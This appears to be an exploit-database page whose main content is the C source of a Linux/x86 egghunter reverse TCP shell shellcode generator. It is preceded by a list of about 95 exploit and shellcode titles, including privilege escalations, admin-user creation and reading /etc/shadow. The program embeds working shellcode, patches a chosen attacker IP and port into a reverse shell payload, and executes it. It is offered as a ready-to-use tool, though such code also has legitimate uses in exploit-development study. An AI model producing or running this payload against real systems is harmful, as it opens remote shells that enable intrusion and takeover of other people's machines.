de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
214 lines
No EOL
7.1 KiB
C
214 lines
No EOL
7.1 KiB
C
# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
|
|
# Date: 18/07/2021
|
|
# Exploit Author: d7x
|
|
# Tested on: Ubuntu x86
|
|
|
|
/***
|
|
Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
|
|
Author: d7x
|
|
https://d7x.promiselabs.net/
|
|
https://www.promiselabs.net/
|
|
***/
|
|
|
|
/*
|
|
Egghunter payloads from skape modified to work on a modern up to date architecture
|
|
For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
|
|
Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
|
Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
|
|
*/
|
|
|
|
/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
|
|
$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
|
|
void PrintShellcode(unsigned char* s);
|
|
void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
|
|
unsigned char* ConvertStrToHex(unsigned char* s);
|
|
|
|
unsigned char egghunter[][200] = { \
|
|
{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
|
|
{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
|
|
{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
|
|
};
|
|
|
|
/* unsigned char egghunter[] = \
|
|
"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
|
|
//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
|
|
//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
|
|
//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
|
|
//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
|
|
*/
|
|
|
|
/* Reverse TCP Shell:
|
|
egg \x90\x50\x90\x50\x90\x50\x90\x50
|
|
127.1.1.1 4444 */
|
|
unsigned char shellcode[] = \
|
|
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
|
|
|
|
int eggsize = 4; //default
|
|
|
|
main(int argc, char *argv[])
|
|
{
|
|
|
|
if (argc < 2)
|
|
{
|
|
printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
|
|
printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
|
|
"%s 1 AABB 127.1.1.1 4444\n"
|
|
"%s 2 AABBCCDD 127.1.1.1 4444\n"
|
|
"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
|
|
printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
|
|
"\nDefault shellcode IP and port 127.1.1.1:4444");
|
|
printf("\n\nAvailable egghunters:"
|
|
"\n0 - access method (39 bytes), requires executable egg"
|
|
"\n1 - access revisited (37 bytes)"
|
|
"\n2 - sigaction (32 bytes)\n"
|
|
);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int eh = atoi((char *)argv[1]);
|
|
if (eh < 0 || eh > 2)
|
|
{
|
|
printf("Invalid Egghunter: %d!\n", eh);
|
|
|
|
return 0;
|
|
}
|
|
|
|
if (argc > 2)
|
|
{
|
|
if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
|
|
|
|
if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
|
|
{
|
|
printf("Egg has to be at least 4 or exactly 8 bytes!"
|
|
"\nExample eggs: 9050, 9060, C0D3,"
|
|
"\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
|
|
"\n"
|
|
);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int i;
|
|
for (i = 0; i < strlen(argv[2]); i+=2)
|
|
if (argv[2][i] == '0' && argv[2][i+1] == '0')
|
|
{
|
|
printf("No null bytes!\n");
|
|
return 0;
|
|
}
|
|
|
|
}
|
|
|
|
/* change egg if provided */
|
|
int eh_offset = 1; // default offset for access method (39 bytes)
|
|
if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
|
|
else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
|
|
|
|
if (argc > 2) {
|
|
|
|
unsigned char* new_egg = argv[2], *s, *tmp;
|
|
printf("Changing egg to %s...\n", new_egg);
|
|
|
|
s = ConvertStrToHex(argv[2]);
|
|
tmp = s;
|
|
|
|
|
|
//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
|
|
strcat(tmp, s);
|
|
if (strlen(argv[2]) == 4)
|
|
strcat(tmp, tmp);
|
|
|
|
//PrintShellcode(s);
|
|
change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
|
|
change_shellcode_bytes(shellcode, 0, 7, tmp);
|
|
}
|
|
|
|
printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
|
|
printf("Egghunter shellcode: \n");
|
|
PrintShellcode(egghunter[eh]);
|
|
|
|
printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
|
|
|
|
// change shellcode IP address
|
|
unsigned char *s2 = shellcode;
|
|
if (argc > 3)
|
|
{
|
|
printf("%s\n", argv[3]);
|
|
|
|
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
|
|
struct sockaddr_in ipaddr;
|
|
inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
|
|
|
|
|
|
int i = eggsize*2+26, a;
|
|
int e = i+3;
|
|
|
|
for (i, a = 0; i <= e; i++, a+=8)
|
|
{
|
|
s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
|
|
printf("Byte %d: %.02x\n", i, s2[i]);
|
|
}
|
|
|
|
}
|
|
|
|
// change shellcode Port
|
|
int port = 4444; //0x115c - default
|
|
|
|
if (argc > 4)
|
|
{
|
|
port = atoi(argv[4]);
|
|
unsigned int p1 = (port >> 8) & 0xff;
|
|
unsigned int p2 = port & 0xff;
|
|
s2[eggsize*2+32] = (unsigned char){p1};
|
|
s2[eggsize*2+33] = (unsigned char){p2};
|
|
}
|
|
|
|
printf("Port %d\n", port);
|
|
PrintShellcode(s2);
|
|
|
|
printf("\n");
|
|
int (*ret)() = (int(*)())egghunter[eh];
|
|
|
|
ret();
|
|
|
|
}
|
|
|
|
void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
|
|
{
|
|
int i, a;
|
|
for (i = offset, a = 0; i <= n; i++, a++)
|
|
shellcode_n[i] = (unsigned char) {new[a]};
|
|
// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
|
|
}
|
|
|
|
void PrintShellcode(unsigned char* s)
|
|
{
|
|
printf("\"");
|
|
while (*s)
|
|
printf("\\x%.02x", (unsigned int) *s++);
|
|
|
|
printf("\"\n");
|
|
}
|
|
|
|
unsigned char* ConvertStrToHex(unsigned char* s)
|
|
{
|
|
if (s[0] == '0' && s[1] == 'x') s += 2;
|
|
unsigned char buf[strlen(s)/2];
|
|
buf[strlen(s)/2] = '\0';
|
|
|
|
int len = sizeof(buf);
|
|
size_t count;
|
|
|
|
for (count = 0; count < len; count++) {
|
|
sscanf(s, "%2hhx", &buf[count]);
|
|
s += 2;
|
|
}
|
|
|
|
return buf;
|
|
} |